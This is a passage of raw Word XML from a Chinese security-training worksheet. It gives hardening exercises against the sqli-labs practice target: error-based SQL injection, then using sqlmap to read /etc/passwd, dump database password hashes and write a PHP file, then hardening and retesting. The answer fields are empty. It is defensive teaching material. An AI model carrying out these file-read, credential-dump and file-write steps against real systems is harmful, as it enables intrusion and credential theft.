          <w:p w14:paraId="059C35CA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35CB" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="51"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35CC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35CD" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="51"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35CE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C35D0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C35D1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc18798"/>
      <w:r>
        <w:t>关闭报错信息显示</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35D3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35D2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35D5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35D4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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关闭报错信息显示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35D7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35D6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35D9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35D8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过方式进行加固</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35DB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35DA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35E0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35DC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35DD" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52"/>
              </w:num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采用报</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>错回显方式</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>获取当前数据库名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35DE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52"/>
              </w:num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通过修改代码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/var/www/html/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-labs/Less-1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>index.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>，屏蔽报错信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35DF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="52"/>
              </w:num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再次尝试注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35E2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35E1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35E9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35E3" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="53"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35E4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35E5" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="53"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35E6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35E7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="53"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35E8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C35EA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C35EB" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc8097"/>
      <w:r>
        <w:t>禁用高危函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35ED" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35EC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35EF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35EE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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禁用高危函数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35F1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35F0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35F3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35F2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过禁用高危函数方式进行加固</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35F5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35F4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35FA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35F6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="54"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35F7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="54"/>
              </w:num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尝试用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>读取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>文件内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35F8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="54"/>
              </w:num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禁用文件操作权限</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C35F9" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="54"/>
              </w:num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重新读取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>文件内容（温馨提示：再次测试时，需要用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>--flush-session</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>清空会话，否则会有缓存数据）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C35FC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C35FB" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3603" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C35FD" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="55"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35FE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C35FF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="55"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3600" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3601" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="55"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3602" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C3604" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3605" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc2307"/>
      <w:r>
        <w:t>降低账号权限</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3607" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3606" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3609" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3608" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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lastRenderedPageBreak/>
              <w:t>降低账号权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C360B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C360A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C360D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C360C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>降低账号权限</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>方式进行加固</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C360F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C360E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3615" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3610" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3611" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:num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尝试通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>获取数据库密码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3612" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:num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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/var/www/html/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-labs/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>-connections/db-creds.inc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>文件将数据库用户改成</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3613" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:num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再次尝试通过</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>获取数据库密码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>（温馨提示：再次测试时，需要用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>--flush-session</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>清空会话，否则会有缓存数据）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3614" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:num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尝试</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>往目标</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>根目录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>写入一个</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>test.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>文件（原本数据库进程以</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户运行，没有权限写入）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3617" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3616" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C361E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3618" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3619" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C361A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C361B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C361C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
